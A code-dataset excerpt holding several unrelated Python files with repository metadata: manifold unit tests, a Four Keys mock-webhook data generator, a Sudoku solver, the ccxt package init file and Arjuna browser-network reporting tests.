np.real(np.sum(np.conjugate(G) * H)), self.man.inner(X, G, H)
)
assert np.isreal(self.man.inner(X, G, H))
def test_proj(self):
# Test proj(proj(X)) == proj(X) and proj(X)
# belongs to the horizontal space of Stiefel
X = self.man.rand()
U = rnd.randn(self.k, self.m, self.n) + 1j * rnd.randn(
self.k, self.m, self.n
)
proj_U = self.man.proj(X, U)
proj_proj_U = self.man.proj(X, proj_U)
np_testing.assert_allclose(proj_U, proj_proj_U)
np_testing.assert_allclose(
multiprod(multihconj(X), proj_U),
np.zeros((self.k, self.n, self.n)),
atol=1e-10,
)
def test_norm(self):
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_almost_equal(self.man.norm(X, U), la.norm(U))
assert np.isreal(self.man.norm(X, U))
def test_rand(self):
# Just make sure that things generated are on the manifold and that
# if you generate two they are not equal.
X = self.man.rand()
np_testing.assert_allclose(
multiprod(multihconj(X), X), multieye(self.k, self.n), atol=1e-10
)
Y = self.man.rand()
assert la.norm(X - Y) > 1e-6
assert np.iscomplex(X).all()
def test_randvec(self):
# Make sure things generated are in tangent space and if you generate
# two then they are not equal.
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_allclose(
multisym(multiprod(multihconj(X), U)),
np.zeros((self.k, self.n, self.n)),
atol=1e-10,
)
V = self.man.randvec(X)
assert la.norm(U - V) > 1e-6
assert np.iscomplex(U).all()
def test_dist(self):
X = self.man.rand()
Y = self.man.rand()
np_testing.assert_almost_equal(
self.man.dist(X, Y), self.man.norm(X, self.man.log(X, Y))
)
def test_exp_log_inverse(self):
X = self.man.rand()
Y = self.man.rand()
U = self.man.log(X, Y)
Z = self.man.exp(X, U)
np_testing.assert_almost_equal(0, self.man.dist(Y, Z), decimal=5)
def test_log_exp_inverse(self):
X = self.man.rand()
U = self.man.randvec(X)
Y = self.man.exp(X, U)
V = self.man.log(X, Y)
# Check that the manifold difference between the tangent vectors u and
# v is 0
np_testing.assert_almost_equal(0, self.man.norm(X, U - V))
def test_retr(self):
# Test that the result is on the manifold and that for small
# tangent vectors it has little effect.
x = self.man.rand()
u = self.man.randvec(x)
xretru = self.man.retr(x, u)
np_testing.assert_allclose(
multiprod(multihconj(xretru), xretru),
multieye(self.k, self.n),
atol=1e-10,
)
u = u * 1e-6
xretru = self.man.retr(x, u)
np_testing.assert_allclose(xretru, x + u)
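# A hedged, numpy-only illustration (not part of the original test module): the horizontal
# projector exercised throughout these tests, P(U) = U - X X^H U, is idempotent whenever
# X has orthonormal columns, which is what test_proj verifies through the manifold API.
if __name__ == "__main__":
    _X = rnd.randn(5, 2) + 1j * rnd.randn(5, 2)
    _X, _ = la.qr(_X)  # orthonormalize so that X^H X = I
    _U = rnd.randn(5, 2) + 1j * rnd.randn(5, 2)
    _proj = lambda u: u - _X @ np.conjugate(_X.T) @ u
    np_testing.assert_allclose(_proj(_proj(_U)), _proj(_U), atol=1e-10)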
| 31.902128
| 79
| 0.571028
|
da7daffd4aa23dda21fc463dc4a3f0ac4262c187
| 8,620
|
py
|
Python
|
data_generator/generate_data.py
|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | 1
|
2021-09-13T10:03:03.000Z
|
2021-09-13T10:03:03.000Z
|
data_generator/generate_data.py
|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | 1
|
2021-12-17T16:02:25.000Z
|
2021-12-17T16:03:48.000Z
|
data_generator/generate_data.py
|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import hmac
import json
import os
import random
import secrets
import time
import sys
from hashlib import sha1
from urllib.request import Request, urlopen
def make_changes(num_changes, vcs, event_timespan):
changes = []
max_time = time.time() - event_timespan
head_commit = None
event = None
for x in range(num_changes):
change_id = secrets.token_hex(20)
unix_timestamp = time.time() - random.randrange(0, event_timespan)
change = {
"id": change_id,
"timestamp": datetime.datetime.fromtimestamp(unix_timestamp),
}
if unix_timestamp > max_time:
max_time = unix_timestamp
head_commit = change
changes.append(change)
if vcs == "gitlab":
event = {
"object_kind": "push",
"checkout_sha": head_commit["id"],
"commits": changes,
}
if vcs == "github":
event = {"head_commit": head_commit, "commits": changes}
return event
def create_github_deploy_event(change):
deployment = {
"deployment_status": {
"updated_at": change["timestamp"],
"id": secrets.token_hex(20),
"state": "success",
},
"deployment": {
"sha": change["id"],
},
}
return deployment
def create_gitlab_pipeline_event(changes):
pipeline = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
pipeline = {
"object_kind": "pipeline",
"object_attributes": {
"created_at": c["timestamp"],
"id": random.randrange(0, 1000),
"status": "success",
},
"commit": c,
}
return pipeline
def create_gitlab_deploy_event(changes):
deployment = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
deployment = {
"object_kind": "deployment",
"status": "success",
"status_changed_at": c["timestamp"].strftime("%F %T +0200"),
"deployment_id": random.randrange(0, 1000),
"commit_url": f"http://example.com/root/test/commit/{checkout_sha}",
}
return deployment
def make_github_issue(root_cause):
event = {
"issue": {
"created_at": root_cause["timestamp"],
"updated_at": datetime.datetime.now(),
"closed_at": datetime.datetime.now(),
"number": random.randrange(0, 1000),
"labels": [{"name": "Incident"}],
"body": "root cause: %s" % root_cause["id"],
},
"repository": {"name": "foobar"},
}
return event
def make_gitlab_issue(changes):
issue = None
checkout_sha = changes["checkout_sha"]
for c in changes["commits"]:
if c["id"] == checkout_sha:
issue = {
"object_kind": "issue",
"object_attributes": {
"created_at": c["timestamp"],
"updated_at": datetime.datetime.now(),
"closed_at": datetime.datetime.now(),
"id": random.randrange(0, 1000),
"labels": [{"title": "Incident"}],
"description": "root cause: %s" % c["id"],
},
}
return issue
def make_webhook_request(vcs, webhook_url, secret, event_type, data, token=None):
data = json.dumps(data, default=str).encode()
request = Request(webhook_url, data)
if vcs == "github":
signature = hmac.new(secret.encode(), data, sha1)
request.add_header("X-Github-Event", event_type)
request.add_header("X-Hub-Signature", "sha1=" + signature.hexdigest())
request.add_header("User-Agent", "GitHub-Hookshot/mock")
if vcs == "gitlab":
request.add_header("X-Gitlab-Event", event_type)
request.add_header("X-Gitlab-Token", secret)
request.add_header("Content-Type", "application/json")
request.add_header("Mock", True)
if token:
request.add_header("Authorization", f"Bearer {token}")
return request
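# A hedged, illustrative sketch (not part of the original script): how a receiver could
# verify the "X-Hub-Signature" header produced above. `verify_github_signature` is a
# hypothetical helper name; it relies only on the `hmac` and `sha1` imports already present.
def verify_github_signature(secret, body, signature_header):
    """Return True when signature_header matches the HMAC-SHA1 of body under secret."""
    expected = "sha1=" + hmac.new(secret.encode(), body, sha1).hexdigest()
    # compare_digest avoids leaking timing information during the comparison
    return hmac.compare_digest(expected, signature_header)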
def post_to_webhook(vcs, webhook_url, secret, event_type, data, token=None):
request = make_webhook_request(vcs, webhook_url, secret, event_type, data, token)
response = urlopen(request)
if response.getcode() == 204:
return 1
else:
return 0
if __name__ == "__main__":
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument(
"--event_timespan",
"-t",
type=int,
default=604800,
help="time duration (in seconds) of timestamps of generated events \
(from [Now-timespan] to [Now]); default=604800 (1 week)",
)
parser.add_argument(
"--num_events",
"-e",
type=int,
default=20,
help="number of events to generate; default=20",
)
parser.add_argument(
"--num_issues",
"-i",
type=int,
default=2,
help="number of issues to generate; default=2",
)
parser.add_argument(
"--vc_system",
"-v",
required=True,
choices=["gitlab", "github"],
help="version control system (e.g. 'github', 'gitlab')",
)
args = parser.parse_args()
if args.num_issues > args.num_events:
print("Error: num_issues cannot be greater than num_events")
sys.exit()
# get environment vars
webhook_url = os.environ.get("WEBHOOK")
secret = os.environ.get("SECRET")
token = os.environ.get("TOKEN")
if not webhook_url or not secret:
print(
"Error: please ensure the following environment variables are set: WEBHOOK, SECRET"
)
sys.exit()
all_changesets = []
changes_sent = 0
for x in range(args.num_events):
# make a change set containing a random number of changes
changeset = make_changes(
random.randrange(1, 5),
args.vc_system,
args.event_timespan,
)
# Send individual changes data
for c in changeset["commits"]:
curr_change = None
if args.vc_system == "gitlab":
curr_change = {
"object_kind": "push",
"checkout_sha": c["id"],
"commits": [c],
}
if args.vc_system == "github":
curr_change = {"head_commit": c, "commits": [c]}
changes_sent += post_to_webhook(
args.vc_system, webhook_url, secret, "push", curr_change, token
)
# Send fully associated push event
post_to_webhook(args.vc_system, webhook_url, secret, "push", changeset, token)
# Make and send a deployment
if args.vc_system == "gitlab":
deploy = create_gitlab_deploy_event(changeset)
post_to_webhook(
args.vc_system, webhook_url, secret, "deployment", deploy, token
)
if args.vc_system == "github":
deploy = create_github_deploy_event(changeset["head_commit"])
post_to_webhook(
args.vc_system, webhook_url, secret, "deployment_status", deploy, token
)
all_changesets.append(changeset)
# randomly create incidents associated to changes
changesets_with_issues = random.sample(all_changesets, args.num_issues)
for changeset in changesets_with_issues:
issue = None
if args.vc_system == "gitlab":
issue = make_gitlab_issue(changeset)
if args.vc_system == "github":
issue = make_github_issue(changeset["head_commit"])
post_to_webhook(args.vc_system, webhook_url, secret, "issues", issue, token)
print(f"{changes_sent} changes successfully sent to event-handler")
| 30.785714
| 95
| 0.581323
|
0d5113d881ff0c9c457e7eaf3b8c4e4293d25828
| 6,381
|
py
|
Python
|
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
Sudoku_Solver.py
|
sameer-m-dev/sudoku-solver
|
b7f8fec5d705ebddace7bac9970bbefa5f4da5ef
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[139]:
#naming rows and columns
rows = 'ABCDEFGHI'
cols = '123456789'
# In[140]:
def cross(a, b):
return [s+t for s in a for t in b]
# In[142]:
#creating our sudoku boxes
boxes = cross(rows, cols)
# In[143]:
row_units = [cross(r, cols) for r in rows]
# Element example:
# row_units[0] = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9']
# This is the top most row.
column_units = [cross(rows, c) for c in cols]
# Element example:
# column_units[0] = ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1', 'H1', 'I1']
# This is the left most column.
square_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]
# Element example:
# square_units[0] = ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']
# This is the top left square.
unitlist = row_units + column_units + square_units
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
peers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)
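# In[ ]:
# A small, hedged sanity check added for illustration (not in the original notebook);
# it only uses the structures defined above: 27 units in total, every box belongs to
# exactly 3 units and has exactly 20 peers.
assert len(unitlist) == 27
assert all(len(units[b]) == 3 for b in boxes)
assert all(len(peers[b]) == 20 for b in boxes)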
# In[146]:
def display(values):
"""
Display the values as a 2-D grid.
Input: The sudoku in dictionary form
Output: None
"""
width = 1+max(len(values[s]) for s in boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
# In[152]:
def grid_values_old(grid):
"""Convert grid string into {<box>: <value>} dict with '.' value for empties.
Args:
grid: Sudoku grid in string form, 81 characters long
Returns:
Sudoku grid in dictionary form:
- keys: Box labels, e.g. 'A1'
- values: Value in corresponding box, e.g. '8', or '.' if it is empty.
"""
assert len(grid) == 81, "Input grid must be a string of length 81 (9x9)"
return dict(zip(boxes, grid))
# In[217]:
grid = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
grid2 = '..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
grid3= '8..........36......7..9.2...5...7.......457.....1...3...1....68..85...1..9....4..' #worlds hardest sudoku
# In[220]:
display(grid_values_old(grid))
# In[221]:
def grid_values(grid):
"""Convert grid string into {<box>: <value>} dict with '123456789' value for empties.
Args:
grid: Sudoku grid in string form, 81 characters long
Returns:
Sudoku grid in dictionary form:
- keys: Box labels, e.g. 'A1'
- values: Value in corresponding box, e.g. '8', or '123456789' if it is empty.
"""
values = []
all_digits = '123456789'
for c in grid:
if c == '.':
values.append(all_digits)
elif c in all_digits:
values.append(c)
assert len(values) == 81
return dict(zip(boxes, values))
# In[222]:
display(grid_values(grid))
# In[196]:
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
Go through all the boxes, and whenever there is a box with a single value,
eliminate this value from the set of values of all its peers.
Args:
values: Sudoku in dictionary form.
Returns:
Resulting Sudoku in dictionary form after eliminating values.
"""
solved_values = [box for box in values.keys() if len(values[box]) == 1]
for box in solved_values:
digit = values[box]
for peer in peers[box]:
values[peer] = values[peer].replace(digit,'')
return values
# In[197]:
display(eliminate(grid_values(grid)))
# In[223]:
def only_choice(values):
"""Finalize all values that are the only choice for a unit.
Go through all the units, and whenever there is a unit with a value
that only fits in one box, assign the value to this box.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after filling in only choices.
"""
for unit in unitlist:
for digit in '123456789':
dplaces = [box for box in unit if digit in values[box]]
if len(dplaces) == 1:
values[dplaces[0]] = digit
return values
# In[224]:
display(only_choice(eliminate(grid_values(grid))))
# In[203]:
def reduce_puzzle(values):
"""
Iterate eliminate() and only_choice(). If at some point, there is a box with no available values, return False.
If the sudoku is solved, return the sudoku.
If after an iteration of both functions, the sudoku remains the same, return the sudoku.
Input: A sudoku in dictionary form.
Output: The resulting sudoku in dictionary form.
"""
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# Use the Eliminate Strategy
values = eliminate(values)
# Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return False
return values
# In[215]:
display(reduce_puzzle(grid_values(grid2)))
# In[209]:
def search(values):
"Using depth-first search and propagation, try all possible values."
# First, reduce the puzzle using the previous function
values = reduce_puzzle(values)
if values is False:
return False ## Failed earlier
if all(len(values[s]) == 1 for s in boxes):
return values ## Solved!
# Choose one of the unfilled squares with the fewest possibilities
n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)
# return n,s
# Now use recurrence to solve each one of the resulting sudokus, and
for value in values[s]:
new_sudoku = values.copy()
new_sudoku[s] = value
attempt = search(new_sudoku)
if attempt:
return attempt
# In[218]:
display(search(grid_values(grid3)))
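# In[ ]:
# A hedged convenience sketch (not in the original notebook): `values_to_grid` and `solve`
# are hypothetical helper names wrapping the functions defined above, returning the
# solution as an 81-character string instead of displaying it.
def values_to_grid(values):
    """Flatten a solved {box: digit} dict back into an 81-character grid string."""
    return ''.join(values[box] for box in boxes)
def solve(grid):
    """Solve a grid string with search(); return the solution string, or None on failure."""
    result = search(grid_values(grid))
    return values_to_grid(result) if result else None
print(solve(grid))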
# In[ ]:
| 25.422311
| 115
| 0.605704
|
ff976151eea1c82e7516ee20a423f237a8e96ad8
| 14,242
|
py
|
Python
|
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
python/ccxt/__init__.py
|
ibrahiamm/ccxt
|
9b1d68c58709d568d65399ce2084f731ff530fd0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""CCXT: CryptoCurrency eXchange Trading Library"""
# MIT License
# Copyright (c) 2017 Igor Kroitor
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ----------------------------------------------------------------------------
__version__ = '1.64.44'
# ----------------------------------------------------------------------------
from ccxt.base.exchange import Exchange # noqa: F401
from ccxt.base.precise import Precise # noqa: F401
from ccxt.base.decimal_to_precision import decimal_to_precision # noqa: F401
from ccxt.base.decimal_to_precision import TRUNCATE # noqa: F401
from ccxt.base.decimal_to_precision import ROUND # noqa: F401
from ccxt.base.decimal_to_precision import DECIMAL_PLACES # noqa: F401
from ccxt.base.decimal_to_precision import SIGNIFICANT_DIGITS # noqa: F401
from ccxt.base.decimal_to_precision import TICK_SIZE # noqa: F401
from ccxt.base.decimal_to_precision import NO_PADDING # noqa: F401
from ccxt.base.decimal_to_precision import PAD_WITH_ZERO # noqa: F401
from ccxt.base import errors
from ccxt.base.errors import BaseError # noqa: F401
from ccxt.base.errors import ExchangeError # noqa: F401
from ccxt.base.errors import AuthenticationError # noqa: F401
from ccxt.base.errors import PermissionDenied # noqa: F401
from ccxt.base.errors import AccountSuspended # noqa: F401
from ccxt.base.errors import ArgumentsRequired # noqa: F401
from ccxt.base.errors import BadRequest # noqa: F401
from ccxt.base.errors import BadSymbol # noqa: F401
from ccxt.base.errors import BadResponse # noqa: F401
from ccxt.base.errors import NullResponse # noqa: F401
from ccxt.base.errors import InsufficientFunds # noqa: F401
from ccxt.base.errors import InvalidAddress # noqa: F401
from ccxt.base.errors import AddressPending # noqa: F401
from ccxt.base.errors import InvalidOrder # noqa: F401
from ccxt.base.errors import OrderNotFound # noqa: F401
from ccxt.base.errors import OrderNotCached # noqa: F401
from ccxt.base.errors import CancelPending # noqa: F401
from ccxt.base.errors import OrderImmediatelyFillable # noqa: F401
from ccxt.base.errors import OrderNotFillable # noqa: F401
from ccxt.base.errors import DuplicateOrderId # noqa: F401
from ccxt.base.errors import NotSupported # noqa: F401
from ccxt.base.errors import NetworkError # noqa: F401
from ccxt.base.errors import DDoSProtection # noqa: F401
from ccxt.base.errors import RateLimitExceeded # noqa: F401
from ccxt.base.errors import ExchangeNotAvailable # noqa: F401
from ccxt.base.errors import OnMaintenance # noqa: F401
from ccxt.base.errors import InvalidNonce # noqa: F401
from ccxt.base.errors import RequestTimeout # noqa: F401
from ccxt.base.errors import error_hierarchy # noqa: F401
from ccxt.aax import aax # noqa: F401
from ccxt.ascendex import ascendex # noqa: F401
from ccxt.bequant import bequant # noqa: F401
from ccxt.bibox import bibox # noqa: F401
from ccxt.bigone import bigone # noqa: F401
from ccxt.binance import binance # noqa: F401
from ccxt.binancecoinm import binancecoinm # noqa: F401
from ccxt.binanceus import binanceus # noqa: F401
from ccxt.binanceusdm import binanceusdm # noqa: F401
from ccxt.bit2c import bit2c # noqa: F401
from ccxt.bitbank import bitbank # noqa: F401
from ccxt.bitbay import bitbay # noqa: F401
from ccxt.bitbns import bitbns # noqa: F401
from ccxt.bitcoincom import bitcoincom # noqa: F401
from ccxt.bitfinex import bitfinex # noqa: F401
from ccxt.bitfinex2 import bitfinex2 # noqa: F401
from ccxt.bitflyer import bitflyer # noqa: F401
from ccxt.bitforex import bitforex # noqa: F401
from ccxt.bitget import bitget # noqa: F401
from ccxt.bithumb import bithumb # noqa: F401
from ccxt.bitmart import bitmart # noqa: F401
from ccxt.bitmex import bitmex # noqa: F401
from ccxt.bitpanda import bitpanda # noqa: F401
from ccxt.bitrue import bitrue # noqa: F401
from ccxt.bitso import bitso # noqa: F401
from ccxt.bitstamp import bitstamp # noqa: F401
from ccxt.bitstamp1 import bitstamp1 # noqa: F401
from ccxt.bittrex import bittrex # noqa: F401
from ccxt.bitvavo import bitvavo # noqa: F401
from ccxt.bl3p import bl3p # noqa: F401
from ccxt.btcalpha import btcalpha # noqa: F401
from ccxt.btcbox import btcbox # noqa: F401
from ccxt.btcmarkets import btcmarkets # noqa: F401
from ccxt.btctradeua import btctradeua # noqa: F401
from ccxt.btcturk import btcturk # noqa: F401
from ccxt.buda import buda # noqa: F401
from ccxt.bw import bw # noqa: F401
from ccxt.bybit import bybit # noqa: F401
from ccxt.bytetrade import bytetrade # noqa: F401
from ccxt.cdax import cdax # noqa: F401
from ccxt.cex import cex # noqa: F401
from ccxt.coinbase import coinbase # noqa: F401
from ccxt.coinbaseprime import coinbaseprime # noqa: F401
from ccxt.coinbasepro import coinbasepro # noqa: F401
from ccxt.coincheck import coincheck # noqa: F401
from ccxt.coinex import coinex # noqa: F401
from ccxt.coinfalcon import coinfalcon # noqa: F401
from ccxt.coinmate import coinmate # noqa: F401
from ccxt.coinone import coinone # noqa: F401
from ccxt.coinspot import coinspot # noqa: F401
from ccxt.crex24 import crex24 # noqa: F401
from ccxt.currencycom import currencycom # noqa: F401
from ccxt.delta import delta # noqa: F401
from ccxt.deribit import deribit # noqa: F401
from ccxt.digifinex import digifinex # noqa: F401
from ccxt.eqonex import eqonex # noqa: F401
from ccxt.equos import equos # noqa: F401
from ccxt.exmo import exmo # noqa: F401
from ccxt.flowbtc import flowbtc # noqa: F401
from ccxt.ftx import ftx # noqa: F401
from ccxt.ftxus import ftxus # noqa: F401
from ccxt.gateio import gateio # noqa: F401
from ccxt.gemini import gemini # noqa: F401
from ccxt.hitbtc import hitbtc # noqa: F401
from ccxt.hitbtc3 import hitbtc3 # noqa: F401
from ccxt.hollaex import hollaex # noqa: F401
from ccxt.huobi import huobi # noqa: F401
from ccxt.huobijp import huobijp # noqa: F401
from ccxt.huobipro import huobipro # noqa: F401
from ccxt.idex import idex # noqa: F401
from ccxt.independentreserve import independentreserve # noqa: F401
from ccxt.indodax import indodax # noqa: F401
from ccxt.itbit import itbit # noqa: F401
from ccxt.kraken import kraken # noqa: F401
from ccxt.kucoin import kucoin # noqa: F401
from ccxt.kuna import kuna # noqa: F401
from ccxt.latoken import latoken # noqa: F401
from ccxt.latoken1 import latoken1 # noqa: F401
from ccxt.lbank import lbank # noqa: F401
from ccxt.liquid import liquid # noqa: F401
from ccxt.luno import luno # noqa: F401
from ccxt.lykke import lykke # noqa: F401
from ccxt.mercado import mercado # noqa: F401
from ccxt.mexc import mexc # noqa: F401
from ccxt.ndax import ndax # noqa: F401
from ccxt.novadax import novadax # noqa: F401
from ccxt.oceanex import oceanex # noqa: F401
from ccxt.okcoin import okcoin # noqa: F401
from ccxt.okex import okex # noqa: F401
from ccxt.okex3 import okex3 # noqa: F401
from ccxt.okex5 import okex5 # noqa: F401
from ccxt.paymium import paymium # noqa: F401
from ccxt.phemex import phemex # noqa: F401
from ccxt.poloniex import poloniex # noqa: F401
from ccxt.probit import probit # noqa: F401
from ccxt.qtrade import qtrade # noqa: F401
from ccxt.ripio import ripio # noqa: F401
from ccxt.stex import stex # noqa: F401
from ccxt.therock import therock # noqa: F401
from ccxt.tidebit import tidebit # noqa: F401
from ccxt.tidex import tidex # noqa: F401
from ccxt.timex import timex # noqa: F401
from ccxt.upbit import upbit # noqa: F401
from ccxt.vcc import vcc # noqa: F401
from ccxt.wavesexchange import wavesexchange # noqa: F401
from ccxt.whitebit import whitebit # noqa: F401
from ccxt.xena import xena # noqa: F401
from ccxt.yobit import yobit # noqa: F401
from ccxt.zaif import zaif # noqa: F401
from ccxt.zb import zb # noqa: F401
from ccxt.zipmex import zipmex # noqa: F401
from ccxt.zonda import zonda # noqa: F401
exchanges = [
'aax',
'ascendex',
'bequant',
'bibox',
'bigone',
'binance',
'binancecoinm',
'binanceus',
'binanceusdm',
'bit2c',
'bitbank',
'bitbay',
'bitbns',
'bitcoincom',
'bitfinex',
'bitfinex2',
'bitflyer',
'bitforex',
'bitget',
'bithumb',
'bitmart',
'bitmex',
'bitpanda',
'bitrue',
'bitso',
'bitstamp',
'bitstamp1',
'bittrex',
'bitvavo',
'bl3p',
'btcalpha',
'btcbox',
'btcmarkets',
'btctradeua',
'btcturk',
'buda',
'bw',
'bybit',
'bytetrade',
'cdax',
'cex',
'coinbase',
'coinbaseprime',
'coinbasepro',
'coincheck',
'coinex',
'coinfalcon',
'coinmate',
'coinone',
'coinspot',
'crex24',
'currencycom',
'delta',
'deribit',
'digifinex',
'eqonex',
'equos',
'exmo',
'flowbtc',
'ftx',
'ftxus',
'gateio',
'gemini',
'hitbtc',
'hitbtc3',
'hollaex',
'huobi',
'huobijp',
'huobipro',
'idex',
'independentreserve',
'indodax',
'itbit',
'kraken',
'kucoin',
'kuna',
'latoken',
'latoken1',
'lbank',
'liquid',
'luno',
'lykke',
'mercado',
'mexc',
'ndax',
'novadax',
'oceanex',
'okcoin',
'okex',
'okex3',
'okex5',
'paymium',
'phemex',
'poloniex',
'probit',
'qtrade',
'ripio',
'stex',
'therock',
'tidebit',
'tidex',
'timex',
'upbit',
'vcc',
'wavesexchange',
'whitebit',
'xena',
'yobit',
'zaif',
'zb',
'zipmex',
'zonda',
]
base = [
'Exchange',
'Precise',
'exchanges',
'decimal_to_precision',
]
__all__ = base + errors.__all__ + exchanges
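# A hedged usage sketch appended for illustration (not part of the generated module):
# it instantiates one of the exchange classes imported above; 'enableRateLimit' is a
# standard ccxt option. The guard keeps importing this module side-effect free and no
# network call is made here.
if __name__ == '__main__':
    _demo = binance({'enableRateLimit': True})
    print(_demo.id, 'is one of', len(exchanges), 'supported exchange ids')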
| 46.24026
| 80
| 0.534195
|
aed561fd5fb0c0ddb881baad61795fc30f83347d
| 2,213
|
py
|
Python
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 13
|
2020-05-12T06:32:51.000Z
|
2022-01-24T18:21:19.000Z
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 5
|
2020-02-14T12:51:07.000Z
|
2021-12-01T10:39:51.000Z
|
arjuna-samples/arjex/test/pkg/reporting/check_rep_01_selenium_network.py
|
StefanIGit/arjuna
|
6c7d9099e0d766e7b30936ef25d32c1414133b96
|
[
"Apache-2.0"
] | 25
|
2020-01-16T10:44:25.000Z
|
2022-02-24T13:22:22.000Z
|
# This file is a part of Arjuna
# Copyright 2015-2021 Rahul Verma
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna import *
'''
Try with the following switches to see different behaviors:
-ao browser.network.recorder.enabled true
-ao report.network.always true
'''
def __activity(config=None):
browser = GuiApp(url="https://google.com", config=config)
browser.launch()
browser.network_recorder.record("Test Mile")
browser.go_to_url("http://testmile.com")
browser.network_recorder.register()
browser.quit()
@test
def check_explicit_capture_rec_off_auto_off_pass(request):
# Recording Disabled. Auto recording is off. Filter is on. Inclusion for passed is off.
# Test passes, no network packets in report.
__activity()
@test
def check_explicit_capture_rec_off_auto_off_fail(request):
# Recording Disabled. Auto recording is off. Filter is on. Inclusion for passed is off.
# Test fails, no network packets in report.
__activity()
1/0
@test
def check_explicit_capture_auto_on_pass(request):
# Recording Disabled. Auto recording is on. Filter is on. Inclusion for passed is off.
# Test passes, no network packets in report.
cb = request.config.builder
cb["browser.network.recorder.automatic"] = True
config = cb.register()
__activity(config)
@test
def check_explicit_capture_auto_on_fail(request):
# Recording Disabled. Auto recording is on. Filter is on. Inclusion for passed is off.
# Test fails, no network packets in report.
cb = request.config.builder
cb["browser.network.recorder.automatic"] = True
config = cb.register()
__activity(config)
1/0
| 33.530303
| 91
| 0.735201
|
0b80bf402388f0c0172ca3fb067f7038c3261d38
| 5,113
|
py
|
Python
|
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
] | null | null | null |
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
